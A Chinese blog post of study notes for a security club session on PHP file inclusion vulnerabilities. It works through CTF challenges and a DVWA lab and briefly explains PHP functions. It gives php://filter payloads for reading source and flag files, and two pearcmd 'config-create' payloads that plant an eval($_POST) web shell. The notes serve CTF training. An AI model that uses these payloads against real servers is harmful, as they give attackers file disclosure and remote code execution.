<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 7.1.1">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
  <link rel="stylesheet" href="/lib/pace/pace-theme-minimal.min.css">
  <script src="/lib/pace/pace.min.js"></script>

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="文件包含漏洞文件包含漏洞  举例  https:&#x2F;&#x2F;mail.qq.com&#x2F; 包含fileinc靶场,可以进行本机文件的读取  （XXE外部实体注入  SSRF服务端的请求伪造   ）     vm  ubantu 20.04 CVE-2018-12613 PHPMyAdmin后台 任意文件包含漏洞 CVE-2020-1938 Apache Tomcat 文件包含漏洞        DVWA靶场案">
<meta property="og:type" content="article">
<meta property="og:title" content="文件包含漏洞沙龙所需知识点">
<meta property="og:url" content="http://example.com/2024/03/05/%E7%BD%91%E5%AE%89%E5%8D%8F%E4%BC%9A%E7%AC%AC%E4%B8%80%E6%AC%A1%E8%AF%BB%E5%86%99%E6%B2%99%E9%BE%99/index.html">
<meta property="og:site_name" content="❤ca1hua❤">
<meta property="og:description" content="文件包含漏洞文件包含漏洞  举例  https:&#x2F;&#x2F;mail.qq.com&#x2F; 包含fileinc靶场,可以进行本机文件的读取  （XXE外部实体注入  SSRF服务端的请求伪造   ）     vm  ubantu 20.04 CVE-2018-12613 PHPMyAdmin后台 任意文件包含漏洞 CVE-2020-1938 Apache Tomcat 文件包含漏洞        DVWA靶场案">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://ca1hua.oss-cn-beijing.aliyuncs.com/test/Snipaste_2024-03-04_23-37-26.png">
<meta property="og:image" content="https://ca1hua.oss-cn-beijing.aliyuncs.com/test/Snipaste_2024-03-08_01-24-44.png">
<meta property="og:image" content="https://ca1hua.oss-cn-beijing.aliyuncs.com/test/Snipaste_2024-03-05_01-03-51.png">
<meta property="og:image" content="https://ca1hua.oss-cn-beijing.aliyuncs.com/test/Snipaste_2024-03-05_01-12-06.png">
<meta property="og:image" content="https://ca1hua.oss-cn-beijing.aliyuncs.com/test/Snipaste_2024-03-08_01-43-25.png">
<meta property="og:image" content="https://ca1hua.oss-cn-beijing.aliyuncs.com/test/Snipaste_2024-03-06_00-07-29.png">
<meta property="og:image" content="https://ca1hua.oss-cn-beijing.aliyuncs.com/test/Snipaste_2024-03-06_00-08-35.png">
<meta property="og:image" content="https://ca1hua.oss-cn-beijing.aliyuncs.com/test/Snipaste_2024-03-06_00-12-52.png">
<meta property="og:image" content="https://ca1hua.oss-cn-beijing.aliyuncs.com/test/Snipaste_2024-03-06_00-35-39.png">
<meta property="og:image" content="https://ca1hua.oss-cn-beijing.aliyuncs.com/test/Snipaste_2024-03-06_00-56-41.png">
<meta property="og:image" content="https://ca1hua.oss-cn-beijing.aliyuncs.com/test/Snipaste_2024-03-06_01-17-27.png">
<meta property="og:image" content="https://ca1hua.oss-cn-beijing.aliyuncs.com/test/Snipaste_2024-03-06_01-21-28.png">
<meta property="og:image" content="c:\Users\lenovo\AppData\Roaming\Typora\typora-user-images\image-20240306131310348.png">
<meta property="og:image" content="https://ca1hua.oss-cn-beijing.aliyuncs.com/test/Snipaste_2024-03-06_01-38-15.png">
<meta property="og:image" content="https://ca1hua.oss-cn-beijing.aliyuncs.com/test/Snipaste_2024-03-06_22-10-14.png">
<meta property="og:image" content="https://ca1hua.oss-cn-beijing.aliyuncs.com/test/Snipaste_2024-03-06_22-46-04.png">
<meta property="og:image" content="https://ca1hua.oss-cn-beijing.aliyuncs.com/test/Snipaste_2024-03-08_02-24-01.png">
<meta property="article:published_time" content="2024-03-05T11:28:15.000Z">
<meta property="article:modified_time" content="2024-03-07T18:24:37.498Z">
<meta property="article:author" content="陈曦">
<meta property="article:tag" content="CTF">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://ca1hua.oss-cn-beijing.aliyuncs.com/test/Snipaste_2024-03-04_23-37-26.png">

<link rel="canonical" href="http://example.com/2024/03/05/%E7%BD%91%E5%AE%89%E5%8D%8F%E4%BC%9A%E7%AC%AC%E4%B8%80%E6%AC%A1%E8%AF%BB%E5%86%99%E6%B2%99%E9%BE%99/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>文件包含漏洞沙龙所需知识点 | ❤ca1hua❤</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">❤ca1hua❤</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description"> </p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
        <li class="menu-item menu-item-schedule">

    <a href="/schedule/" rel="section"><i class="fa fa-calendar fa-fw"></i>日程表</a>

  </li>
        <li class="menu-item menu-item-sitemap">

    <a href="/sitemap.xml" rel="section"><i class="fa fa-sitemap fa-fw"></i>站点地图</a>

  </li>
        <li class="menu-item menu-item-commonweal">

    <a href="/404/" rel="section"><i class="fa fa-heartbeat fa-fw"></i>公益 404</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2024/03/05/%E7%BD%91%E5%AE%89%E5%8D%8F%E4%BC%9A%E7%AC%AC%E4%B8%80%E6%AC%A1%E8%AF%BB%E5%86%99%E6%B2%99%E9%BE%99/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/20240222142431.jpg">
      <meta itemprop="name" content="陈曦">
      <meta itemprop="description" content="爱人先爱己，择人先问心，caihua祝你天天开心！">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="❤ca1hua❤">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          文件包含漏洞沙龙所需知识点
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2024-03-05 19:28:15" itemprop="dateCreated datePublished" datetime="2024-03-05T19:28:15+08:00">2024-03-05</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2024-03-08 02:24:37" itemprop="dateModified" datetime="2024-03-08T02:24:37+08:00">2024-03-08</time>
              </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h2 id="文件包含漏洞"><a href="#文件包含漏洞" class="headerlink" title="文件包含漏洞"></a>文件包含漏洞</h2><p>文件包含漏洞</p>
<p><img src="https://ca1hua.oss-cn-beijing.aliyuncs.com/test/Snipaste_2024-03-04_23-37-26.png"></p>
<p>举例  <a target="_blank" rel="noopener" href="https://mail.qq.com/">https://mail.qq.com/</a></p>
<p>包含fileinc靶场,可以进行本机文件的读取</p>
<p><img src="https://ca1hua.oss-cn-beijing.aliyuncs.com/test/Snipaste_2024-03-08_01-24-44.png"></p>
<p>（XXE外部实体注入  SSRF服务端的请求伪造   ）</p>
<p><img src="https://ca1hua.oss-cn-beijing.aliyuncs.com/test/Snipaste_2024-03-05_01-03-51.png"></p>
<img src="https://ca1hua.oss-cn-beijing.aliyuncs.com/test/Snipaste_2024-03-05_01-12-06.png" style="zoom:25%;" />

<p><img src="https://ca1hua.oss-cn-beijing.aliyuncs.com/test/Snipaste_2024-03-08_01-43-25.png"></p>
<p>vm  ubantu 20.04</p>
<p>CVE-2018-12613 PHPMyAdmin后台 任意文件包含漏洞</p>
<p>CVE-2020-1938 Apache Tomcat 文件包含漏洞</p>
<img src="https://ca1hua.oss-cn-beijing.aliyuncs.com/test/Snipaste_2024-03-06_00-07-29.png" style="zoom:50%;" />

<img src="https://ca1hua.oss-cn-beijing.aliyuncs.com/test/Snipaste_2024-03-06_00-08-35.png" style="zoom:50%;" />



<p><img src="https://ca1hua.oss-cn-beijing.aliyuncs.com/test/Snipaste_2024-03-06_00-12-52.png"></p>
<p>DVWA靶场案例演示</p>
<p><img src="https://ca1hua.oss-cn-beijing.aliyuncs.com/test/Snipaste_2024-03-06_00-35-39.png"></p>
<p><img src="https://ca1hua.oss-cn-beijing.aliyuncs.com/test/Snipaste_2024-03-06_00-56-41.png"></p>
<p>白名单</p>
<h4 id="CTF题目复现呢-ctfhub"><a href="#CTF题目复现呢-ctfhub" class="headerlink" title="CTF题目复现呢-ctfhub"></a>CTF题目复现呢-ctfhub</h4><p>1、、   ?file&#x3D;shell.txt</p>
<p>2 php:&#x2F;&#x2F;input、、</p>
<img src="https://ca1hua.oss-cn-beijing.aliyuncs.com/test/Snipaste_2024-03-06_01-17-27.png" style="zoom:67%;" />



<p>3远程包含、、</p>
<p><img src="https://ca1hua.oss-cn-beijing.aliyuncs.com/test/Snipaste_2024-03-06_01-21-28.png"></p>
<p>4、、读取源代码</p>
<p><code>php://filter/resource=</code> 是 PHP 中用于访问各种输入&#x2F;输出流（IO流）的一种特殊的流封装协议。它允许开发人员对数据流进行过滤和操作。当你看到 <code>php://filter/resource=</code> 这种格式时，它通常用于对指定的资源进行一系列的过滤操作。</p>
<img src="C:\Users\lenovo\AppData\Roaming\Typora\typora-user-images\image-20240306131310348.png" alt="image-20240306131310348" style="zoom:67%;" />

<p>LFIsuite  </p>
<img src="https://ca1hua.oss-cn-beijing.aliyuncs.com/test/Snipaste_2024-03-06_01-38-15.png" style="zoom:50%;" />



<h4 id="ACTF2020-新生赛-Include"><a href="#ACTF2020-新生赛-Include" class="headerlink" title="[ACTF2020 新生赛]Include"></a>[ACTF2020 新生赛]Include</h4><p><strong>?file&#x3D;php:&#x2F;&#x2F;filter&#x2F;convert.base64-encode&#x2F;resource&#x3D;flag.php</strong></p>
<h4 id="Weekinclude-0。0"><a href="#Weekinclude-0。0" class="headerlink" title="Weekinclude 0。0"></a>Weekinclude 0。0</h4><p>isset()是PHP中的一个函数，用于检查一个变量是否已经被声明并且不为null。它接受一个或多个参数，并返回一个布尔值，即如果变量已声明且不为null，则返回true，否则返回false。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$var</span> = <span class="string">&quot;Hello&quot;</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$var</span>)) &#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;变量已声明且不为null&quot;</span>;</span><br><span class="line">&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;变量未声明或为null&quot;</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>preg_match()是PHP中的一个函数，用于对字符串进行正则表达式匹配。它接受三个参数：正则表达式模式、要匹配的字符串和可选的一个变量来存储匹配结果。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$pattern</span> = <span class="string">&quot;/hello/i&quot;</span>;</span><br><span class="line"><span class="variable">$string</span> = <span class="string">&quot;Hello, World!&quot;</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="title function_ invoke__">preg_match</span>(<span class="variable">$pattern</span>, <span class="variable">$string</span>)) &#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;匹配成功&quot;</span>;</span><br><span class="line">&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;匹配失败&quot;</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>在上述示例中，使用正则表达式模式<code>/hello/i</code>来匹配字符串<code>&quot;Hello, World!&quot;</code>。<code>/hello/i</code>中的<code>/</code>是正则表达式的分隔符，<code>hello</code>是要匹配的模式，<code>i</code>表示忽略大小写。因为字符串中包含”Hello”，与模式匹配，所以<code>preg_match()</code>的返回值为true，将输出”匹配成功”。</p>
<p><code>preg_match()</code>还可以通过第三个参数来获取匹配结果，示例如下：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$pattern</span> = <span class="string">&quot;/(\\d&#123;3&#125;)-(\\d&#123;4&#125;)/&quot;</span>;</span><br><span class="line"><span class="variable">$string</span> = <span class="string">&quot;Phone: 123-4567&quot;</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="title function_ invoke__">preg_match</span>(<span class="variable">$pattern</span>, <span class="variable">$string</span>, <span class="variable">$matches</span>)) &#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;匹配成功&quot;</span>;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;匹配的区号为：&quot;</span> . <span class="variable">$matches</span>[<span class="number">1</span>];</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;匹配的电话号码为：&quot;</span> . <span class="variable">$matches</span>[<span class="number">2</span>];</span><br><span class="line">&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;匹配失败&quot;</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>在上述示例中，使用正则表达式模式<code>/(\\d&#123;3&#125;)-(\\d&#123;4&#125;)/</code>来匹配字符串<code>&quot;Phone: 123-4567&quot;</code>。<code>(\\d&#123;3&#125;)</code>和<code>(\\d&#123;4&#125;)</code>是两个捕获组，用于提取匹配的区号和电话号码。因为字符串中包含符合模式的部分，所以<code>preg_match()</code>的返回值为true，将输出”匹配成功”，并通过<code>$matches</code>数组获取匹配的结果。</p>
<p>重载是指不改变函数名，但改变函数的参数、参数个数、参数顺序。重载改变了函数的签名。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">preg_match(&#x27;/base|rot/i&#x27;,$file) //这是匹配到base，rot加密就返回1</span><br></pre></td></tr></table></figure>

<p><strong>?file&#x3D;php:&#x2F;&#x2F;filter&#x2F;read&#x3D;convert.iconv.UTF-8.UTF-16&#x2F;resource&#x3D;flag.php</strong></p>
<p><code>filter/read</code> 是一种PHP文件流过滤器（Filter）的方式，它可以用来读取特定类型的数据或对数据进行处理。在PHP中，流过滤器是一种用于在读写文件流时进行数据转换、过滤或处理的机制。</p>
<p><code>filter/read</code>通过指定不同的过滤器参数来读取文件流的内容。它可以用于读取不同的数据源，例如文件、网络流等。通过指定适当的过滤器参数，可以实现从数据源读取数据并进行处理，例如进行编码转换、数据过滤、数据加密等操作。</p>
<p>在给定的payload中，<code>filter/read=convert.iconv.UTF-8.UTF-16</code>使用<code>filter/read</code>过滤器来读取文件的内容，并使用<code>convert.iconv.UTF-8.UTF-16</code>过滤器参数将读取的内容从UTF-8编码转换为UTF-16编码。这样可以实现在读取文件内容时进行编码转换的功能。</p>
<h4 id="NPUCTF2020-ezinclude"><a href="#NPUCTF2020-ezinclude" class="headerlink" title="[NPUCTF2020]ezinclude"></a>[NPUCTF2020]ezinclude</h4><img src="https://ca1hua.oss-cn-beijing.aliyuncs.com/test/Snipaste_2024-03-06_22-10-14.png" style="zoom:50%;" />

<p>[<a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_62046696/article/details/127537427">NPUCTF2020]ezinclude-CSDN博客</a></p>
<img src="https://ca1hua.oss-cn-beijing.aliyuncs.com/test/Snipaste_2024-03-06_22-46-04.png" style="zoom:67%;" />

<p><img src="https://ca1hua.oss-cn-beijing.aliyuncs.com/test/Snipaste_2024-03-08_02-24-01.png"></p>
<h4 id="NewStarCTF-2023-公开赛道-Include-🍐"><a href="#NewStarCTF-2023-公开赛道-Include-🍐" class="headerlink" title="[NewStarCTF 2023 公开赛道]Include 🍐"></a>[NewStarCTF 2023 公开赛道]Include 🍐</h4><p><a target="_blank" rel="noopener" href="https://blog.csdn.net/RABCDXB/article/details/122050370">pearcmd.php的妙用_register_argc_argv-CSDN博客</a></p>
<table>
<thead>
<tr>
<th></th>
<th>fake{Check_register_argc_argv}</th>
</tr>
</thead>
<tbody><tr>
<td></td>
<td>web模式下，只有开启了register_argc_argv，才可以获取外部参数</td>
</tr>
</tbody></table>
<p>?+config-create+&#x2F;&amp;file&#x3D;&#x2F;usr&#x2F;local&#x2F;lib&#x2F;php&#x2F;pearcmd&amp;&#x2F;<?=@eval($_POST['cmd']);?>+shell.php</p>
<h4 id="NewStarCTF-公开赛赛道-IncludeTwo"><a href="#NewStarCTF-公开赛赛道-IncludeTwo" class="headerlink" title="[NewStarCTF 公开赛赛道]IncludeTwo"></a>[NewStarCTF 公开赛赛道]IncludeTwo</h4><p>&#x2F;index.php?+config-create+&#x2F;&amp;file&#x3D;&#x2F;usr&#x2F;local&#x2F;lib&#x2F;php&#x2F;pearcmd&amp;&#x2F;<?=eval($_POST[1])?>+&#x2F;tmp&#x2F;hello.php</p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/CTF/" rel="tag"># CTF</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2024/03/04/%E8%B0%88%E8%B0%8851%E5%8D%95%E7%89%87%E6%9C%BA%E4%B8%AD%E7%9A%84PCF8591/" rel="prev" title="谈谈51单片机中的PCF8591芯片">
      <i class="fa fa-chevron-left"></i> 谈谈51单片机中的PCF8591芯片
    </a></div>
      <div class="post-nav-item"></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E"><span class="nav-number">1.</span> <span class="nav-text">文件包含漏洞</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#CTF%E9%A2%98%E7%9B%AE%E5%A4%8D%E7%8E%B0%E5%91%A2-ctfhub"><span class="nav-number">1.0.1.</span> <span class="nav-text">CTF题目复现呢-ctfhub</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#ACTF2020-%E6%96%B0%E7%94%9F%E8%B5%9B-Include"><span class="nav-number">1.0.2.</span> <span class="nav-text">[ACTF2020 新生赛]Include</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Weekinclude-0%E3%80%820"><span class="nav-number">1.0.3.</span> <span class="nav-text">Weekinclude 0。0</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#NPUCTF2020-ezinclude"><span class="nav-number">1.0.4.</span> <span class="nav-text">[NPUCTF2020]ezinclude</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#NewStarCTF-2023-%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-Include-%F0%9F%8D%90"><span class="nav-number">1.0.5.</span> <span class="nav-text">[NewStarCTF 2023 公开赛道]Include 🍐</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-IncludeTwo"><span class="nav-number">1.0.6.</span> <span class="nav-text">[NewStarCTF 公开赛赛道]IncludeTwo</span></a></li></ol></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="陈曦"
      src="/images/20240222142431.jpg">
  <p class="site-author-name" itemprop="name">陈曦</p>
  <div class="site-description" itemprop="description">爱人先爱己，择人先问心，caihua祝你天天开心！</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">9</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">5</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/ca1hua" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;ca1hua" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 2024-2 – 
  <span itemprop="copyrightYear">2024</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">陈曦</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
